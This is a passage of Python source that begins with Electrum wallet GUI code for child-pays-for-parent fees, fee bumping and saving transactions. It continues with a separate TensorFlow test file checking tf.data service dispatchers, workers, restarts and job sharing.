"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
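# Worked example (illustrative numbers only): with total_size = 300 bytes,
# parent_fee = 500 sat and fee_per_kb = 10_000 sat/kvB, the raw child fee is
# 10_000 * 300 / 1000 - 500 = 2500 sat; it is then capped at max_fee and
# floored at total_size (~1 sat/byte over the combined size).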
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
data_service_ops_test.py
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.experimental.ops import distribute_options
from tensorflow.python.data.experimental.ops import grouping
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.experimental.service import server_lib
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.platform import test
def _address_from_target(target):
# Targets are in the format <protocol>://<address>
return target.split("://")[1]
def _make_distributed_dataset(dataset,
dispatcher,
job_name=None,
max_outstanding_requests=None):
return dataset.apply(
data_service_ops._distribute(
"parallel_epochs",
dispatcher.target,
job_name=job_name,
max_outstanding_requests=max_outstanding_requests,
task_refresh_interval_hint_ms=20))
def _all_cluster_configurations():
with_work_dir = combinations.combine(
work_dir=None, fault_tolerant_mode=[True, False])
without_work_dir = combinations.combine(
work_dir="", fault_tolerant_mode=False)
return with_work_dir + without_work_dir
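# Note: this yields three cluster setups for parameterized tests: an
# auto-created work_dir with fault tolerance on or off, and an explicitly
# empty work_dir with fault tolerance off.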
def _make_distributed_range_dataset(num_elements,
dispatcher,
job_name=None,
max_outstanding_requests=None):
"""Creates a distributed dataset.
Args:
num_elements: The number of elements in the range dataset that will be
distributed.
dispatcher: The dispatcher to distribute to.
job_name: Optional job name for the distributed dataset.
max_outstanding_requests: Optional limit on the number of outstanding
requests.
Returns:
The created dataset.
"""
dataset = dataset_ops.Dataset.range(num_elements)
return _make_distributed_dataset(dataset, dispatcher, job_name,
max_outstanding_requests)
class DataServiceOpsTest(test_base.DatasetTestBase, parameterized.TestCase):
def start_dispatch_server(self,
name="",
port=0,
work_dir=None,
fault_tolerant_mode=True,
job_gc_check_interval_ms=None,
job_gc_timeout_ms=None):
# If a test starts multiple independent dispatch servers, it should give
# them different `name` values.
work_dir = os.path.join(self.get_temp_dir(), "work_dir_",
name) if work_dir is None else work_dir
return server_lib.DispatchServer(
server_lib.DispatcherConfig(
port=port,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode,
job_gc_check_interval_ms=job_gc_check_interval_ms,
job_gc_timeout_ms=job_gc_timeout_ms))
def start_worker_server(self, dispatcher, port=0):
return server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=_address_from_target(dispatcher.target),
port=port,
heartbeat_interval_ms=200))
def restart_dispatcher(self, dispatcher):
"""Stops `dispatcher` and returns a new dispatcher with the same port."""
port = int(_address_from_target(dispatcher.target).split(":")[1])
dispatcher._stop()
return self.start_dispatch_server(
port=port,
work_dir=dispatcher._config.work_dir,
fault_tolerant_mode=dispatcher._config.fault_tolerant_mode)
def restart_worker(self, worker, dispatcher, use_same_port=True):
"""Stops `worker` and returns a new worker."""
port = 0
if use_same_port:
port = int(worker._address.split(":")[1])
worker._stop()
return self.start_worker_server(dispatcher, port)
def start_cluster(self,
num_workers,
name="",
work_dir=None,
fault_tolerant_mode=True):
"""Creates and starts a tf.data service cluster."""
dispatcher = self.start_dispatch_server(
name=name, work_dir=work_dir, fault_tolerant_mode=fault_tolerant_mode)
workers = [self.start_worker_server(dispatcher) for _ in range(num_workers)]
return dispatcher, workers
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
_all_cluster_configurations()))
def testDistributeBasic(self, work_dir, fault_tolerant_mode):
dispatcher, workers = self.start_cluster( # to avoid gcing workers, pylint: disable=unused-variable
1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode)
num_elements = 10
ds = _make_distributed_range_dataset(10, dispatcher)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherStop(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
results = []
results.append(next(iterator).numpy())
dispatcher._stop()
# After the dispatcher dies, the worker should continue providing the rest
# of the dataset's elements.
for _ in range(num_elements - 1):
results.append(next(iterator).numpy())
self.assertEqual(results, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBeforeReading(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
dispatcher = self.restart_dispatcher(dispatcher)
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartDuringReading(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
results = []
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
dispatcher = self.restart_dispatcher(dispatcher)
for elem in iterator:
results.append(elem.numpy())
self.assertEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherRestartBetweenIterations(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(100, dispatcher)
self.assertDatasetProduces(ds, list(range(num_elements)))
dispatcher = self.restart_dispatcher(dispatcher)
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherManyRestarts(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements_start = 10
num_elements_end = 15
datasets = []
for num_elements in range(num_elements_start, num_elements_end):
datasets.append(_make_distributed_range_dataset(num_elements, dispatcher))
dispatcher = self.restart_dispatcher(dispatcher)
for ds, num_elements in zip(datasets,
range(num_elements_start, num_elements_end)):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDispatcherAndWorkerRestart(self):
dispatcher, [worker] = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = dataset_ops.Dataset.range(num_elements)
def restart():
return (self.restart_dispatcher(dispatcher),
self.restart_worker(worker, dispatcher))
ds = _make_distributed_dataset(ds, dispatcher)
dispatcher, worker = restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
dispatcher, worker = restart()
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testDistributeSparse(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
element = sparse_tensor.SparseTensor(
indices=[[0]],
values=constant_op.constant([0], dtype=dtypes.int32),
dense_shape=[1])
ds = dataset_ops.Dataset.from_tensors(element)
ds = _make_distributed_dataset(ds, dispatcher)
results = [sparse_ops.sparse_tensor_to_dense(elem) for elem in ds]
self.assertAllEqual(results, [[0]])
@combinations.generate(test_base.eager_only_combinations())
def testDistributeRagged(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
ds = dataset_ops.Dataset.from_tensor_slices([1, 5, 3, 2, 8])
ds = ds.map(math_ops.range)
ds = ds.apply(batching.dense_to_ragged_batch(2))
ds = _make_distributed_dataset(ds, dispatcher)
results = [elem.to_tensor() for elem in ds]
self.assertAllEqual(results[0], [[0, 0, 0, 0, 0], [0, 1, 2, 3, 4]])
self.assertAllEqual(results[1], [[0, 1, 2], [0, 1, 0]])
self.assertAllEqual(results[2], [[0, 1, 2, 3, 4, 5, 6, 7]])
@combinations.generate(test_base.eager_only_combinations())
def testDifferentShuffleOrders(self):
random_seed.set_random_seed(None)
num_elements = 100
dispatcher, workers = self.start_cluster(2) # to avoid gcing workers, pylint: disable=unused-variable
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.shuffle(num_elements)
ds = _make_distributed_dataset(ds, dispatcher)
output = [elem.numpy() for elem in ds]
# The output will be two sequences of range(num_elements)
# non-deterministically interleaved together. If the orders of the elements
# were the same, first_order and second_order computed below will be equal.
first_order = {}
second_order = {}
for element in output:
if element in first_order:
second_order[element] = len(second_order)
else:
first_order[element] = len(first_order)
self.assertNotEqual(first_order, second_order)
@combinations.generate(test_base.eager_only_combinations())
def testMultipleEpochs(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 3
ds = _make_distributed_range_dataset(num_elements, dispatcher)
for _ in range(10):
self.assertEqual(list(range(num_elements)), [elem.numpy() for elem in ds])
@combinations.generate(test_base.eager_only_combinations())
def testRepeatedDataset(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
num_repetitions = 5
ds = _make_distributed_range_dataset(num_elements, dispatcher)
ds = ds.repeat(num_repetitions)
self.assertDatasetProduces(
ds, expected_output=num_repetitions * list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testConcurrentEpoch(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
num_datasets = 3
iterators = []
results = []
for _ in range(num_datasets):
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterators.append(iter(ds))
results.append([])
for _ in range(num_elements):
for dataset_ind in range(num_datasets):
result = next(iterators[dataset_ind]).numpy()
results[dataset_ind].append(result)
for result in results:
self.assertEqual(list(range(num_elements)), result)
@combinations.generate(test_base.eager_only_combinations())
def testSharedEpoch(self):
self.skipTest("Not yet implemented")
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
num_iterators = 3
ds = _make_distributed_range_dataset(num_elements, dispatcher)
result = []
iterators = []
for _ in range(num_iterators):
iterators.append(iter(ds))
# Alternate reading between the iterators.
for _ in range(2):
for it in iterators:
result.append(next(it).numpy())
# Drain the rest of the elements.
for it in iterators:
for elem in it:
result.append(elem.numpy())
self.assertCountEqual(list(range(num_elements)), result)
@combinations.generate(test_base.eager_only_combinations())
def testMultiWorker(self):
num_workers = 3
dispatcher, workers = self.start_cluster(num_workers) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = _make_distributed_range_dataset(num_elements, dispatcher)
results = [elem.numpy() for elem in ds]
self.assertCountEqual(num_workers * list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testStartServersLate(self):
# Test that the data service client performs retries instead of failing when
# the dataset is created before the dispatcher and worker are started.
try:
import portpicker # pylint: disable=g-import-not-at-top
dispatcher_port = portpicker.pick_unused_port()
except:
raise self.skipTest("Flakes in portpicker library do not represent "
"TensorFlow errors.")
dispatcher = server_lib.DispatchServer(
server_lib.DispatcherConfig(port=dispatcher_port), start=False)
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=_address_from_target(dispatcher.target), port=0),
start=False)
def start_servers():
time.sleep(1)
dispatcher.start()
worker.start()
start_servers_thread = threading.Thread(target=start_servers, daemon=True)
start_servers_thread.start()
num_elements = 10
ds = _make_distributed_range_dataset(num_elements, dispatcher)
results = [elem.numpy() for elem in ds]
self.assertEqual(list(range(num_elements)), results)
start_servers_thread.join()
@combinations.generate(test_base.eager_only_combinations())
def testAddWorkerMidJob(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
results = []
# Read halfway through the dataset.
for _ in range(num_elements // 2):
results.append(next(iterator).numpy())
new_worker = self.start_worker_server(dispatcher) # to avoid gcing workers, pylint: disable=unused-variable
# Wait for the new worker to register with the dispatcher.
while dispatcher._num_workers() < 2:
time.sleep(10 / 1000) # 10ms
for elem in iterator:
results.append(elem.numpy())
self.assertCountEqual(2 * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(use_same_port=[True, False]),
_all_cluster_configurations()))
def testRestartWorker(self, use_same_port, work_dir, fault_tolerant_mode):
dispatcher, [worker] = self.start_cluster(
1, work_dir=work_dir, fault_tolerant_mode=fault_tolerant_mode)
num_elements = 100
ds = _make_distributed_range_dataset(num_elements, dispatcher)
iterator = iter(ds)
# Read halfway through the dataset.
midpoint = num_elements // 2
for i in range(midpoint):
self.assertEqual(i, next(iterator).numpy())
# Stop the original worker and start a new one.
worker = self.restart_worker(worker, dispatcher, use_same_port)
# There may have been some elements prefetched from the first worker
# before it was stopped.
while True:
val = next(iterator).numpy()
if val == 0:
break
# The dataset starts over now that we read from the new worker.
# TODO(b/157086991): Iterate until end of sequence when we support
# detecting lost workers.
for i in range(1, num_elements // 2):
val = next(iterator).numpy()
self.assertEqual(i, val)
@combinations.generate(test_base.eager_only_combinations())
def testMaxOutstandingRequests(self):
num_workers = 3
dispatcher, workers = self.start_cluster(num_workers) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = _make_distributed_range_dataset(
num_elements, dispatcher, max_outstanding_requests=1)
self.assertCountEqual(num_workers * list(range(num_elements)),
self.getDatasetOutput(ds))
@combinations.generate(test_base.eager_only_combinations())
def testInsideFunction(self):
num_workers = 3
dispatcher, workers = self.start_cluster(num_workers) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
@def_function.function
def f():
ds = _make_distributed_range_dataset(num_elements, dispatcher)
result = tensor_array_ops.TensorArray(
dtypes.int64, size=num_workers * num_elements, dynamic_size=True)
i = 0
for elem in ds:
result = result.write(i, elem)
i += 1
return result.stack()
result = list(f().numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), result)
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobName(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
def make_ds():
return dataset_ops.Dataset.range(num_elements).shuffle(num_elements)
ds1 = _make_distributed_dataset(make_ds(), dispatcher, job_name="job_name")
ds2 = _make_distributed_dataset(make_ds(), dispatcher, job_name="job_name")
iter1 = iter(ds1)
iter2 = iter(ds2)
results = []
for _ in range(num_elements // 5):
results.append(next(iter1).numpy())
results.append(next(iter2).numpy())
for elem in iter1:
results.append(elem.numpy())
for elem in iter2:
results.append(elem.numpy())
self.assertCountEqual(list(range(num_elements)), results)
@combinations.generate(test_base.eager_only_combinations())
def testDifferentJobNames(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds1 = _make_distributed_dataset(ds, dispatcher, job_name="job_name1")
ds2 = _make_distributed_dataset(ds, dispatcher, job_name="job_name2")
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameMultiIteration(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds1 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
ds2 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
# iteration 1
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, [])
# iteration 2
self.assertDatasetProduces(ds2, list(range(num_elements)))
self.assertDatasetProduces(ds1, [])
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameRepeat(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 100
num_repetitions = 3
ds = dataset_ops.Dataset.range(num_elements)
ds1 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
ds1 = ds1.repeat(num_repetitions)
ds2 = _make_distributed_dataset(ds, dispatcher, job_name="job_name")
ds2 = ds2.repeat(num_repetitions)
results = []
iter1 = iter(ds1)
iter2 = iter(ds2)
for _ in range((num_elements * num_repetitions) // 5):
results.append(next(iter1).numpy())
for _ in range((num_elements * num_repetitions) // 5):
results.append(next(iter2).numpy())
for elem in iter1:
results.append(elem.numpy())
for elem in iter2:
results.append(elem.numpy())
self.assertCountEqual(num_repetitions * list(range(num_elements)), results)
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(job_name=[None, "test"])))
def testGcUnusedJob(self, job_name):
dispatcher = self.start_dispatch_server(
job_gc_check_interval_ms=50, job_gc_timeout_ms=20)
worker = self.start_worker_server(dispatcher) # pylint: disable=unused-variable
num_elements = 10
ds = _make_distributed_range_dataset(
num_elements, dispatcher, job_name=job_name)
it = iter(ds)
self.assertEqual(0, next(it).numpy())
self.assertEqual(1, worker._num_tasks())
del it
while worker._num_tasks() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testDontGcUsedJob(self):
dispatcher = self.start_dispatch_server(
job_gc_check_interval_ms=50, job_gc_timeout_ms=20)
worker = self.start_worker_server(dispatcher) # pylint: disable=unused-variable
num_elements = 10
it1 = iter(
_make_distributed_range_dataset(
num_elements, dispatcher, job_name="test1"))
it2 = iter(
_make_distributed_range_dataset(
num_elements, dispatcher, job_name="test2"))
it3 = iter( # this iterator keeps the task alive. pylint: disable=unused-variable
_make_distributed_range_dataset(
num_elements, dispatcher, job_name="test2"))
self.assertEqual(2, worker._num_tasks())
del it1
del it2
# Check that only the first job is gced. The second job will not be gced
# because there is still an outstanding iterator for it.
while worker._num_tasks() > 1:
time.sleep(0.1)
self.assertEqual(1, worker._num_tasks())
@combinations.generate(test_base.eager_only_combinations())
def testApplyDeterminismOption(self):
elements = list(range(10))
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
def dataset_fn(delay_ms):
def interleave_fn(x):
ds = dataset_ops.Dataset.from_tensors(x)
if math_ops.equal(x, 0):
ds = ds.apply(testing.sleep(delay_ms * 1000))
else:
ds = ds.apply(testing.sleep(0))
return ds
ds = dataset_ops.Dataset.from_tensor_slices(elements)
ds = ds.interleave(interleave_fn, cycle_length=10, num_parallel_calls=10)
opts = dataset_ops.Options()
opts.experimental_deterministic = False
ds = ds.with_options(opts)
ds = _make_distributed_dataset(ds, dispatcher)
return ds
self.checkDeterminism(
dataset_fn=dataset_fn,
expect_determinism=False,
expected_elements=elements)
def run_stateful(self, external_state_policy):
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements).map(
lambda _: random_ops.random_uniform(()))
options = dataset_ops.Options()
options.experimental_external_state_policy = external_state_policy
ds = ds.with_options(options)
dispatcher, workers = self.start_cluster(3) # to avoid gcing workers, pylint: disable=unused-variable
ds = _make_distributed_dataset(ds, dispatcher)
next(iter(ds))
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(external_state_policy=[
distribute_options.ExternalStatePolicy.IGNORE,
distribute_options.ExternalStatePolicy.WARN
])))
def testStatefulNoError(self, external_state_policy):
self.run_stateful(external_state_policy)
@combinations.generate(test_base.eager_only_combinations())
def testStatefulError(self):
with self.assertRaises(errors.FailedPreconditionError):
self.run_stateful(distribute_options.ExternalStatePolicy.FAIL)
@combinations.generate(test_base.eager_only_combinations())
def testDistributeFromInterleave(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
ds = dataset_ops.Dataset.range(2)
def interleave_fn(_):
dataset = dataset_ops.Dataset.range(2)
_make_distributed_dataset(dataset, dispatcher)
return dataset
ds = ds.interleave(interleave_fn, cycle_length=2)
self.assertDatasetProduces(ds, [0, 0, 1, 1])
@combinations.generate(test_base.eager_only_combinations())
def testDistributeNonStringAddresses(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(ValueError, "service must be a string"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=1))
@combinations.generate(test_base.eager_only_combinations())
def testDistributeEmptyAddress(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesWithLiteralMatch(ValueError,
"service must not be empty"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=""))
@combinations.generate(test_base.eager_only_combinations())
def testDistributeInvalidProcessingMode(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(ValueError,
"invalid is not a valid processing mode"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="invalid", service="grpc://localhost:5000"))
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetId(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(dispatcher.target, ds)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, ds.element_spec)
self.assertDatasetProduces(from_dataset_id_ds, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdMultipleComponents(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds = dataset_ops.Dataset.zip({"a": (ds, ds), "b": ds})
dataset_id = data_service_ops.register_dataset(dispatcher.target, ds)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, ds.element_spec)
output = self.getDatasetOutput(from_dataset_id_ds)
for i in range(num_elements):
self.assertEqual(i, output[i]["a"][0])
self.assertEqual(i, output[i]["a"][1])
self.assertEqual(i, output[i]["b"])
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdWrongElementSpec(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(dispatcher.target, ds)
wrong_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, wrong_spec)
with self.assertRaisesRegex(errors.FailedPreconditionError,
"Expected a tensor of type variant"):
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdNotRegistered(self):
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
dataset_id = 0
element_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", dispatcher.target, dataset_id, element_spec)
with self.assertRaisesRegex(errors.NotFoundError, "Dataset id"):
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.default_test_combinations())
def testCancellation(self):
self.skipTest("b/162521601")
sleep_microseconds = int(1e6) * 1000
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
# Create a dataset which produces the first element quickly, and the second
# element slowly. Fetching the first element triggers prefetching of the
# second element, which we should be able to cancel.
slow = dataset_ops.Dataset.range(1)
slow = slow.apply(testing.sleep(sleep_microseconds))
ds = dataset_ops.Dataset.range(1).concatenate(slow)
ds = _make_distributed_dataset(ds, dispatcher)
ds = ds.prefetch(1)
get_next = self.getNext(ds, requires_initialization=True)
self.assertEqual(0, self.evaluate(get_next()))
# Without properly implemented cancellation, we will hang here while trying
# to garbage collect the dataset iterator.
@combinations.generate(test_base.eager_only_combinations())
def testRegisterEquivalentDatasets(self):
ds_1 = dataset_ops.Dataset.range(10)
ds_2 = dataset_ops.Dataset.range(10)
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
id_1 = data_service_ops.register_dataset(dispatcher.target, ds_1)
id_2 = data_service_ops.register_dataset(dispatcher.target, ds_2)
self.assertEqual(id_1.numpy(), id_2.numpy())
@combinations.generate(test_base.eager_only_combinations())
def testRegisterDifferentDatasets(self):
ds_1 = dataset_ops.Dataset.range(10)
ds_2 = dataset_ops.Dataset.range(20)
dispatcher, workers = self.start_cluster(1) # to avoid gcing workers, pylint: disable=unused-variable
id_1 = data_service_ops.register_dataset(dispatcher.target, ds_1)
id_2 = data_service_ops.register_dataset(dispatcher.target, ds_2)
self.assertNotEqual(id_1.numpy(), id_2.numpy())
